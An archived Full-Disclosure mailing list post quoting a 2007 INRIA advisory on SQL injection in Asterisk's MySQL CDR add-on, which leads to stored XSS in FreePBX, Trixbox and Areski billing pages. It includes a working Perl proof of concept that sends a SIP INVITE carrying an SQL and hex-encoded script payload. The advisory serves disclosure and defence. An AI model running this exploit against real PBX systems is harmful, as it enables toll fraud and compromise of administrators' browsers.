| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 19 Oct 2007 23:11:46 -0500
From: phioust <phioust@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: XSS and SQL injection via SIP (part 2) and
toll fraud bonus
LOL !!!!XSS!!!!
PDP ALERT !!! THEY ARE STEALING YOUR RESEARCH!
On 10/19/07, Radu State <State@...ia.fr> wrote:
>
> In a previous post (http://seclists.org/fulldisclosure/2007/Oct/0174.html)
> , we have seen how XSS injection can be performed over SIP to inject
> malicious JavaScript into the browser of an user that check the call
> history of his phone. In this post, we will detail how XSS injection can be
> performed over SIP by an additional SQL injection.
>
>
>
> Some SIP proxies store information gathered from SIP headers into databses
> used for billing and accounting purposes. This is also the case for the
> vulnerability disclosed In the following. If this information is not
> properly filtered, once it will be displayed to the administrator it can
> perform a second order SQL Injection, that is : during the display, it gets
> interpreted as SQL by the application. In this case, two things can result:
> First, the database can be changed (for instance the call length can be
> changed to a small value and thus the caller can do toll fraud. Sometimes,
> if the target system is not well secured, SQL injection can lead to system
> compromise because most database server allow some interaction with the
> target OS.
>
>
>
> However, the additional feature is that XSS can also result, because
> JavaScript can be stored into the database with the SQL injection and
> executed on the browser when the admin will check it (this is a kind of log
> Injection process). As was pointed out in my previous posting, XSS can be
> used with tools like Beef and XSS proxy to scan the internal network,
> deactivate firewalls, basically all the dangers of CSRF/XSRF are not a
> reality. The main issue is that most applications that deal with CDR data
> are not considering this type of threat.
>
> * *
>
> *Title :* SQL injection in asterisk-addons and XSS injection in WWW
> application in Areski, FreePBX and Trixbox
>
>
>
> Id: KIPH 12*
>
> *
>
> *Credits *
>
> *Humberto Abdelnur (Ph.D student) the Madynes group at INRIA *
>
> *Radu** State** (Ph.D), the Madynes group at INRIA *
>
> *Olivier Festor (Ph.D), the Madynes group at INRIA *
>
> * *
>
>
>
> *Software version for which vendors were notified:*
>
>
>
> Asterisk-addon (SQL injection)
>
> Areski v 2.0.1 and earlier (XSS injection)
>
> FreePBX (2.3.00 and earlier) XSS injection
>
> Tribox v.2.3.1 and earlier (XSS injection)
>
>
>
> *Severity:* High, XSS and SQL injection can lead to the compromise of
> an internal network
>
>
> *Overview:
>
> *
>
> Asterisk as itself does not support billing reports but provide libraries,
> asterisk-addon, which may allow a third entity to compute them. Specifically
> the functions exported by cdr_addon_mysql.c allows to log the Call Detail
> Records (CDR) in the MySQL database.
>
> Areski, FreePBX and Trixbox use the information stored in such database in
> order to manage, compute generate billing reports or display the load of
> the PBX.
>
> *Vulnerability Synopsis:*
>
> Certain functions in cdr_addon_mysql.c do not properly escaped input
> characters from fields of incoming calls before to stored them in the
> database. This issue will allow, to a malicious user, two main attacks:
>
> 1. Inject SQL statements which will obfuscate the quantity of
> minute made for the billing
> 2. Inject through the SQL statement values which will be recognized
> as a Java script when a WWW management application for CDR run.
>
> The attack may be performed by an unsubscribed user in the domain (if
> anonymous calls are allowed).
> This attacker may inject negative number in the CDR table in order to
> decrease the minutes of calling. Also, the attacker may inject Java Script
> tags to be executed by the administrator PC when she/he enter to the CDR
> website.
>
> Note that in order to perform the Cross Script injection, the SQL
> injection technique is necessary due that special characters as "<" are to
> be filtered by asterisk, while with the SQL injection they can be rewritten
> as 0x60 (Hexadecimal representation) which wont be filtered.
>
> *Impact:*
>
> Information from the database can be manipulated for malicious used.
>
> Execution of malicious scripts may be executed in the administrator
> machine.
>
> *Proof of Concept:*
>
>
> The script will create an entry with duration values -9 and
> <script>alert(1)</script> that will be show when the administrator check the
> website.
>
> *Command**: *asterisk_cdr_sqlinjection.pl <callUser> <targetIP>
> <targetPort> <attackerUser> <localIP> <localPort>
>
> --
>
> #!/usr/bin/perl
>
>
>
> #############################################
>
> # Vulnerabily discovered using KiF ~ Kiph #
>
> # #
>
> # Authors: #
>
> # Humberto J. Abdelnur (Ph.D Student) #
>
> # Radu State (Ph.D) #
>
> # Olivier Festor (Ph.D) #
>
> # #
>
> # Madynes Team, LORIA - INRIA Lorraine #
>
> # http://madynes.loria.fr #
>
> #############################################
>
>
>
> use IO::Socket::INET;
>
> use String::Random;
>
> $foo = new String::Random;
>
>
>
> die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP>
> <localPort>" unless ($ARGV[5]);
>
>
>
> sub iso2hex($) {
>
> my $hex = '';
>
> for (my $i = 0; $i < length($_[0]); $i++) {
>
> my $ordno = ord substr($_[0], $i, 1);
>
> $hex .= sprintf("%lx", $ordno);
>
> }
>
>
>
> $hex =~ s/ $//;;
>
> $hex;
>
> }
>
>
>
>
>
> $callUser = $ARGV[0];
>
> $targetIP = $ARGV[1];
>
> $targetPort = $ARGV[2];
>
>
>
> $attackerUser = $ARGV[3];
>
> $attackerIP= $ARGV[4];
>
> $attackerPort= $ARGV[5];
>
>
>
> $socket=new IO::Socket::INET->new(
>
> Proto=>'udp',
>
> PeerPort=>$targetPort,
>
> PeerAddr=>$targetIP,
>
> LocalPort=>$attackerPort);
>
>
>
> $scriptinjection= iso2hex("<script>alert(1)</script>");
>
> $sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*";
>
>
>
> $callid= $foo->randpattern("CCccnCn");
>
> $cseq = $foo->randregex('\d\d\d\d');
>
>
>
> $sdp = "v=0\r
>
> o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
>
> s=-\r
>
> c=IN IP4 $attackerIP\r
>
> t=0 0\r
>
> m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
>
> a=sendrecv\r
>
> a=ptime:20\r
>
> a=maxptime:200\r
>
> a=fmtp:96 mode-change-neighbor=1\r
>
> a=fmtp:18 annexb=no\r
>
> a=fmtp:98 0-15\r
>
> a=rtpmap:96 AMR/8000/1\r
>
> a=rtpmap:0 PCMU/8000/1\r
>
> a=rtpmap:8 PCMA/8000/1\r
>
> a=rtpmap:97 iLBC/8000/1\r
>
> a=rtpmap:18 G729/8000/1\r
>
> a=rtpmap:98 telephone-event/8000/1\r
>
> a=rtpmap:13 CN/8000/1\r
>
> ";
>
> $sdplen= length $sdp;
>
>
>
> $msg = "INVITE sip:$sqlinjection\@$targetIP SIP/2.0\r
>
> Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r
>
> From: <sip:$attackerUser\@$attackerIP>;tag=1\r
>
> To: <sip:$callUser\@$targetIP>\r
>
> Call-ID: $callid\@$attackerIP\r
>
> CSeq: $cseq INVITE\r
>
> Max-Forwards: 70\r
>
> Contact: <sip:$attackerUser\@$attackerIP>\r
>
> Content-Type: application/sdp\r
>
> Content-Length: $sdplen\r
>
> \r
>
> $sdp";
>
>
>
> $socket->send($msg);
>
>
>
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists